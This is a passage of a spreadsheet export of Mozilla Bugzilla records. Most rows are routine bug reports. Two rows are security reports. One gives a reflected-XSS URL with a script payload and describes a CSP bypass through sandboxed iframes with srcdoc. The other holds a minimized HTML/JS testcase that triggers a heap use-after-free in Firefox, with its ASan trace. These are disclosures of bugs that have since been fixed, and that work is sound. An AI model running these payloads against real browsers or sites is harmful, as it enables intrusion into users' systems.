      </c>
      <c r="G3223" t="n">
        <v>5</v>
      </c>
      <c r="H3223" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3223" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3223" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K3223" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3223" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3223" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3223" t="inlineStr"/>
      <c r="Q3223" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3223" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3223" t="inlineStr">
        <is>
          <t>2012Q3</t>
        </is>
      </c>
      <c r="T3223" t="n">
        <v>1</v>
      </c>
      <c r="U3223" t="n">
        <v>0</v>
      </c>
      <c r="V3223" t="n">
        <v>4</v>
      </c>
      <c r="W3223" t="inlineStr">
        <is>
          <t>This bug tracks all search related suggestions by Bram and Susan that should be implemented immediately.</t>
        </is>
      </c>
      <c r="X3223" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3224">
      <c r="A3224" t="n">
        <v>109311</v>
      </c>
      <c r="B3224" t="inlineStr">
        <is>
          <t>2001-11-09 07:36:21 -0800</t>
        </is>
      </c>
      <c r="C3224" t="inlineStr">
        <is>
          <t>Bugzilla Users' Best Practices Guide</t>
        </is>
      </c>
      <c r="D3224" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E3224" t="n">
        <v>1</v>
      </c>
      <c r="F3224" t="n">
        <v>1</v>
      </c>
      <c r="G3224" t="n">
        <v>4</v>
      </c>
      <c r="H3224" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3224" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3224" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K3224" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L3224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3224" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3224" t="inlineStr"/>
      <c r="Q3224" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3224" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3224" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3224" t="n">
        <v>1</v>
      </c>
      <c r="U3224" t="n">
        <v>0</v>
      </c>
      <c r="V3224" t="n">
        <v>24</v>
      </c>
      <c r="W3224" t="inlineStr">
        <is>
          <t>We need to let users know how they should be using Bugzilla.  This document
should not be a part of the Bugzilla Guide, it should be linked from the
Bugzilla pages.  It should be templatised so it can be easily customised by
installations and bmo can add their own Mozilla-specific stuff.
To demonstrate what I mean, the following comes to mind:
1. Don't use sigs in comments.  Everyone knows who you are.
2. Don't add comments saying what you're doing, as they cause people to receive
e-mail who aren't interested.  Only comment if you have something to say about
_why_ you're doing something.
3. If you need to link multiple bugs to one bug via dependencies, edit the one
bug rather than the many so as to reduce bugmail sent out on the one bug.
Let's try to keep this non-controversial (ie no "take XXX discussions to
newsgroups").
Asa can you please CC any people who might have something to say here.</t>
        </is>
      </c>
      <c r="X3224" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3225">
      <c r="A3225" t="n">
        <v>1225250</v>
      </c>
      <c r="B3225" t="inlineStr">
        <is>
          <t>2015-11-16 11:57:59 -0800</t>
        </is>
      </c>
      <c r="C3225" t="inlineStr">
        <is>
          <t>«failed assertion "fPixelRef-&gt;rowBytes() == fRowBytes"» with canvas, shadow, drawImage(HTMLVideoElement)</t>
        </is>
      </c>
      <c r="D3225" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:41 -0700</t>
        </is>
      </c>
      <c r="E3225" t="n">
        <v>1</v>
      </c>
      <c r="F3225" t="n">
        <v>1</v>
      </c>
      <c r="G3225" t="n">
        <v>3</v>
      </c>
      <c r="H3225" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3225" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3225" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3225" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3225" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3225" t="inlineStr">
        <is>
          <t>[gfx-noted][post-critsmash-triage][adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q3225" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3225" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3225" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T3225" t="n">
        <v>1</v>
      </c>
      <c r="U3225" t="n">
        <v>0</v>
      </c>
      <c r="V3225" t="n">
        <v>28</v>
      </c>
      <c r="W3225" t="inlineStr">
        <is>
          <t>Created attachment 8688051
testcase (crashes Firefox) (requires path adjustment)
Debug:
  gfx/skia/skia/src/core/SkBitmap.cpp:1343: failed assertion "fPixelRef-&gt;rowBytes() == fRowBytes"
ASan:
  SEGV on unknown address
  [@ S16_opaque_D32_filter_DX]
Nightly:
  bp-66bed0f0-5e76-458d-a14b-e8d112151116
  [@ S16_opaque_D32_filter_DX]</t>
        </is>
      </c>
      <c r="X3225" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3226">
      <c r="A3226" t="n">
        <v>1259567</v>
      </c>
      <c r="B3226" t="inlineStr">
        <is>
          <t>2016-03-24 13:14:54 -0700</t>
        </is>
      </c>
      <c r="C3226" t="inlineStr">
        <is>
          <t>Add a title and UI improvements for the Tier menu</t>
        </is>
      </c>
      <c r="D3226" t="inlineStr">
        <is>
          <t>2016-03-29 21:39:17 -0700</t>
        </is>
      </c>
      <c r="E3226" t="n">
        <v>1</v>
      </c>
      <c r="F3226" t="n">
        <v>1</v>
      </c>
      <c r="G3226" t="n">
        <v>7</v>
      </c>
      <c r="H3226" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3226" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3226" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3226" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3226" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3226" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3226" t="inlineStr"/>
      <c r="Q3226" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3226" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S3226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3226" t="n">
        <v>1</v>
      </c>
      <c r="U3226" t="n">
        <v>0</v>
      </c>
      <c r="V3226" t="n">
        <v>9</v>
      </c>
      <c r="W3226" t="inlineStr">
        <is>
          <t>I noticed the new Tier menu and thought I might be able to improve the layout and consistency a tiny bit. Feel free to ignore my PR though if you guys prefer the current appearance.
Specifically:
o adding a title property "Show/hide job tiers"
o making 'Tier' lowercase 'tier' for improved association with the 'tier' labels in the job tables (I know it's not bootstrap convention to not have Sentence case or Title Case, but perhaps worthwhile in this menu?)
o removing 'Show" which is repeated in each of the menus
o adjusting the menu padding a bit</t>
        </is>
      </c>
      <c r="X3226" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3227">
      <c r="A3227" t="n">
        <v>544944</v>
      </c>
      <c r="B3227" t="inlineStr">
        <is>
          <t>2010-02-08 12:31:15 -0800</t>
        </is>
      </c>
      <c r="C3227" t="inlineStr">
        <is>
          <t>Disable dashboard widgets on homepage in home/dashboard.php</t>
        </is>
      </c>
      <c r="D3227" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E3227" t="n">
        <v>1</v>
      </c>
      <c r="F3227" t="n">
        <v>1</v>
      </c>
      <c r="G3227" t="n">
        <v>4</v>
      </c>
      <c r="H3227" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3227" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3227" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3227" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3227" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3227" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3227" t="inlineStr"/>
      <c r="Q3227" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3227" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3227" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3227" t="n">
        <v>1</v>
      </c>
      <c r="U3227" t="n">
        <v>0</v>
      </c>
      <c r="V3227" t="n">
        <v>6</v>
      </c>
      <c r="W3227" t="inlineStr">
        <is>
          <t>Disable dashboard widgets on homepage which access the top_crashes_by_signature table.
http://breakpad.pastebin.mozilla.org/701615
This is a short term fix.</t>
        </is>
      </c>
      <c r="X3227" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3228">
      <c r="A3228" t="n">
        <v>518705</v>
      </c>
      <c r="B3228" t="inlineStr">
        <is>
          <t>2009-09-24 15:47:44 -0700</t>
        </is>
      </c>
      <c r="C3228" t="inlineStr">
        <is>
          <t>Expose download sources to add-on developers</t>
        </is>
      </c>
      <c r="D3228" t="inlineStr">
        <is>
          <t>2016-02-04 14:54:25 -0800</t>
        </is>
      </c>
      <c r="E3228" t="n">
        <v>1</v>
      </c>
      <c r="F3228" t="n">
        <v>1</v>
      </c>
      <c r="G3228" t="n">
        <v>6</v>
      </c>
      <c r="H3228" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3228" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3228" t="inlineStr">
        <is>
          <t>Statistics</t>
        </is>
      </c>
      <c r="K3228" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L3228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3228" t="inlineStr"/>
      <c r="Q3228" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3228" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3228" t="inlineStr">
        <is>
          <t>5.2</t>
        </is>
      </c>
      <c r="T3228" t="n">
        <v>1</v>
      </c>
      <c r="U3228" t="n">
        <v>0</v>
      </c>
      <c r="V3228" t="n">
        <v>15</v>
      </c>
      <c r="W3228" t="inlineStr">
        <is>
          <t>We'll be adding tracking codes to all install buttons on the site in bug 507214 which can be completed once install buttons are rewritten in bug 498825 (which was to be finished for 5.1 and has slipped to 5.2)
In bug 507221 we'll be keeping track of download sources in the db, and this bug is about exposing those sources to add-on developers in the Statistics Dashboard.
There are several top-level sources, such as Search, Category Browse, Collections, etc. (full list is in attachment 392581) Among these are custom external sources that developers can use on their own sites, so if I have a link to install my add-on in my blog, I can set src=ext-blog and that should show up in AMO's sources table.
So, we will need to display all of these sources and the number of downloads in the stats dashboard. I'm thinking this should just be another dropdown option with a timeplot graph showing the different sources and the normal CSV export for them.
In addition to the timeplot graph, however, we should have a separate sources page that breaks down in detail the sources. I'm thinking something like
+------------------------------------------------------------------------+
| Source                         | Last 7 Days | Last 30 Days | All Time |
+------------------------------------------------------------------------+
| Search Results                 |         9   |          18  |     36   |
|    (brief description of what  |             |              |          |
|     this means)                |             |              |          |
|                                |             |              |          |
| Collections                    |         5   |          10  |     20   |
|    (brief description of what  |             |              |          |
|     this means)                |             |              |          |
+------------------------------------------------------------------------+
And below that, a breakdown of how many downloads have come from each collection in a similar table.
Assigning to myself to get chowse's bugzilla account working again so I can assign to chowse for the designs of this page, which I think he already started on last month.</t>
        </is>
      </c>
      <c r="X3228" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3229">
      <c r="A3229" t="n">
        <v>474039</v>
      </c>
      <c r="B3229" t="inlineStr">
        <is>
          <t>2009-01-16 14:01:55 -0800</t>
        </is>
      </c>
      <c r="C3229" t="inlineStr">
        <is>
          <t>unable to post link with ? in project-&gt;do more-&gt;links</t>
        </is>
      </c>
      <c r="D3229" t="inlineStr">
        <is>
          <t>2009-07-29 09:23:41 -0700</t>
        </is>
      </c>
      <c r="E3229" t="n">
        <v>1</v>
      </c>
      <c r="F3229" t="n">
        <v>1</v>
      </c>
      <c r="G3229" t="n">
        <v>5</v>
      </c>
      <c r="H3229" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3229" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J3229" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K3229" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3229" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3229" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3229" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3229" t="inlineStr"/>
      <c r="Q3229" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3229" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3229" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3229" t="n">
        <v>1</v>
      </c>
      <c r="U3229" t="n">
        <v>0</v>
      </c>
      <c r="V3229" t="n">
        <v>5</v>
      </c>
      <c r="W3229" t="inlineStr">
        <is>
          <t>While editing my Fennec project, I expanded the "do more" section and started adding links.  I tried to add a link to a bugzilla bug (such as):
https://bugzilla.mozilla.org/show_bug.cgi?id=473988
This was fine and dandy, but after saving it, I click on the link (I like to test things), and I am taken here:
https://bugzilla.mozilla.org/show_bug.cgi
I edit the project again, and the link shows:
https://bugzilla.mozilla.org/show_bug.cgi?id=473988
So something is wrong with the display of those links.  I was able to manually type the html into the "do more" section to work around this.</t>
        </is>
      </c>
      <c r="X3229" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3230">
      <c r="A3230" t="n">
        <v>1073952</v>
      </c>
      <c r="B3230" t="inlineStr">
        <is>
          <t>2014-09-28 06:12:19 -0700</t>
        </is>
      </c>
      <c r="C3230" t="inlineStr">
        <is>
          <t>CSP can be bypassed with &lt;iframe [sandbox] and [srcdoc]&gt;</t>
        </is>
      </c>
      <c r="D3230" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:26 -0700</t>
        </is>
      </c>
      <c r="E3230" t="n">
        <v>1</v>
      </c>
      <c r="F3230" t="n">
        <v>1</v>
      </c>
      <c r="G3230" t="n">
        <v>3</v>
      </c>
      <c r="H3230" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3230" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3230" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3230" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L3230" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3230" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N3230" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3230" t="inlineStr">
        <is>
          <t>[reporter-external], [domsecurity-backlog][adv-main55+]</t>
        </is>
      </c>
      <c r="Q3230" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3230" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3230" t="n">
        <v>1</v>
      </c>
      <c r="U3230" t="n">
        <v>0</v>
      </c>
      <c r="V3230" t="n">
        <v>85</v>
      </c>
      <c r="W3230" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Steps to reproduce:
Open following link.
http://csp.csrf.jp/target.php?body=&lt;a href="javascript:alert(1)"&gt;xss&lt;/a&gt;
This page has an reflected xss in 'body' parameter in query string but it is protected by CSP "default-src 'self'".
Even if script code is injected via 'body' in URI, it's execution may be prevented by CSP.
Actual results:
If an attacker opens the page in &lt;iframe sandbox&gt; and he/she injects script code with &lt;iframe srcdoc&gt;, injected script is executed with bypassing it's CSP.
Please see the following proof of concept page. alert(1) may be executed even though the page opened in iframe is protected by CSP.
http://mallory.csrf.jp/cspbypass.html
Expected results:
Script execution in http://csp.csrf.jp/target.php has to be protected by this site's CSP.
Note that Google Chrome does prevent execution in same situation.</t>
        </is>
      </c>
      <c r="X3230" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3231">
      <c r="A3231" t="n">
        <v>328262</v>
      </c>
      <c r="B3231" t="inlineStr">
        <is>
          <t>2006-02-22 21:53:48 -0800</t>
        </is>
      </c>
      <c r="C3231" t="inlineStr">
        <is>
          <t>Incorrect stress test cache statistics cause QA test failures</t>
        </is>
      </c>
      <c r="D3231" t="inlineStr">
        <is>
          <t>2006-03-14 16:23:01 -0800</t>
        </is>
      </c>
      <c r="E3231" t="n">
        <v>1</v>
      </c>
      <c r="F3231" t="n">
        <v>1</v>
      </c>
      <c r="G3231" t="n">
        <v>3</v>
      </c>
      <c r="H3231" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3231" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3231" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3231" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="L3231" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3231" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3231" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3231" t="inlineStr"/>
      <c r="Q3231" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3231" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3231" t="inlineStr">
        <is>
          <t>3.11.1</t>
        </is>
      </c>
      <c r="T3231" t="n">
        <v>1</v>
      </c>
      <c r="U3231" t="n">
        <v>0</v>
      </c>
      <c r="V3231" t="n">
        <v>10</v>
      </c>
      <c r="W3231" t="inlineStr">
        <is>
          <t>A week ago, Christophe reported that he was beginning to see numerous 
stress test failures, stress testing ECC on various platforms.  
The output log for a typical failure looked like this:
ssl.sh: Stress TLS ECDH-ECDSA AES 128 CBC with SHA (no reuse) ----
[snip]
strsclnt -q -p 8444 -d ../client -B -s -w nss -c 10 -C :C004 -N \
          mace.red.iplanet.com
strsclnt started at Wed Feb 15 03:13:08 PST 2006
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: 0 cache hits; 7 cache misses, 0 cache not reusable
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: 0 cache hits; 9 cache misses, 0 cache not reusable
strsclnt completed at Wed Feb 15 03:13:11 PST 2006
ssl.sh: Stress TLS ECDH-ECDSA AES 128 CBC with SHA (no reuse) produced a returncode of 1, expected is 0.  FAILED
strsclnt was retuning a non-zero exit code because the sum of the 3 cache
statistics did not equal the number of connections attempted.  
The command line calls for doing 10 tests.  
There are 10 lines of output that read: SSL: Server Certificate Validated.
indicating that 10 full handshakes were done, but the sum of the cache
statistics is only 9, not 10.   This is causing nightly QA tests to report
failure, and so needs to be treated as P1.  
This problem blocks bug 324887, and blocks NSS 3.11.1.
I suspect that the explanation for the statistical error is that the cache
counters are not updated atomically.  Here are the lines of code from
ssl3con.c that update those counters:
3302:       ++ssl3stats.sch_sid_cache_not_ok;
3310:   ++ssl3stats.sch_sid_cache_hits;
3321:   ++ssl3stats.sch_sid_cache_misses;
4293:   ++ssl3stats.hsh_sid_cache_hits;
4312:   ++ssl3stats.hsh_sid_cache_not_ok;
4314:   ++ssl3stats.hsh_sid_cache_misses;
5154:       ++ssl3stats.hch_sid_cache_not_ok;
5327:   ++ssl3stats.hch_sid_cache_hits;
5389:   ++ssl3stats.hch_sid_cache_not_ok;
5394:    ++ssl3stats.hch_sid_cache_misses;
5557:    ++ssl3stats.hch_sid_cache_misses;
To test this hypothesis, I propose to change the above 11 lines of code 
to call PR_AtomicIncrement.  But there is a gotcha.  
PR_AtomicIncrement operates on PR_Int32 values only.  The counters named
above are part of a public structure, and are of type "long".  So, simply
changing each line above to call PR_AtomicIncrement will produce build
errors on 64-bit platforms where sizeof(long) != sizeof(PRInt32).
All the binary compatible solutions to this problem that occur to me require conditional compilation using a pre-processor symbol that unambiguously means 
"sizeof(long) &gt; sizeof(PRInt32)".  
This seems to be a recurring problem for NSS.</t>
        </is>
      </c>
      <c r="X3231" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3232">
      <c r="A3232" t="n">
        <v>1499861</v>
      </c>
      <c r="B3232" t="inlineStr">
        <is>
          <t>2018-10-17 13:36:01 -0700</t>
        </is>
      </c>
      <c r="C3232" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::HTMLOptionsCollection_Binding::add</t>
        </is>
      </c>
      <c r="D3232" t="inlineStr">
        <is>
          <t>2024-05-30 09:49:01 -0700</t>
        </is>
      </c>
      <c r="E3232" t="n">
        <v>1</v>
      </c>
      <c r="F3232" t="n">
        <v>1</v>
      </c>
      <c r="G3232" t="n">
        <v>3</v>
      </c>
      <c r="H3232" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3232" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3232" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3232" t="inlineStr">
        <is>
          <t>64 Branch</t>
        </is>
      </c>
      <c r="L3232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3232" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3232" t="inlineStr">
        <is>
          <t>[adv-main64+][adv-esr60.4+]</t>
        </is>
      </c>
      <c r="Q3232" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3232" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T3232" t="n">
        <v>1</v>
      </c>
      <c r="U3232" t="n">
        <v>0</v>
      </c>
      <c r="V3232" t="n">
        <v>39</v>
      </c>
      <c r="W3232" t="inlineStr">
        <is>
          <t>Created attachment 9018034
crash.html (minimised testcase)
The following testcase crashes the lates ASAN build of Firefox 64.0a1 (BuildID=20181017165417). It requires a fuzzing build (--enable-fuzzing) and the pref fuzzing.enabled=true.
&lt;script&gt;
function start() {
    o260=document.createElementNS('http://www.w3.org/1999/xhtml','select');
    o261=document.createElementNS('http://www.w3.org/1999/xhtml','optgroup');
    o577=o260.options;
    o651=document.createElementNS('http://www.w3.org/1999/xhtml','optgroup');
    o261.appendChild(o651);
    o261.addEventListener('DOMNodeRemoved',fun0);
    o995=o577.add(o651);
}
function fun0() {
    o260=null;o261=null;o651=null;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==15482==ERROR: AddressSanitizer: heap-use-after-free on address 0x6120000aef68 at pc 0x7f73eef09f74 bp 0x7ffe1de27650 sp 0x7ffe1de27648
READ of size 8 at 0x6120000aef68 thread T0 (file:// Content)
    #0 0x7f73eef09f73 in GetParentNode /builds/worker/workspace/build/src/dom/base/nsINode.h:953:12
    #1 0x7f73eef09f73 in IsDocument /builds/worker/workspace/build/src/dom/base/nsINode.h:418
    #2 0x7f73eef09f73 in IsAllowedAsChild(nsIContent*, nsINode*, bool, nsINode*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2092
    #3 0x7f73eef0a58a in EnsurePreInsertionValidity2 /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2241:8
    #4 0x7f73eef0a58a in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:2307
    #5 0x7f73f1ae800e in mozilla::dom::HTMLOptionsCollection_Binding::add(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLOptionsCollection*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLOptionsCollectionBinding.cpp:170:9
    #6 0x7f73f1e4f270 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3315:13
    #7 0x7f73fac5f60b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:468:15
    #8 0x7f73fac5f60b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:560
    #9 0x7f73fac4858e in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:620:12
    #10 0x7f73fac4858e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3458
    #11 0x7f73fac2d85b in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447:12
    #12 0x7f73fac6011e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:587:15
    #13 0x7f73fac61eb2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:633:10
    #14 0x7f73f9d3550d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2979:12
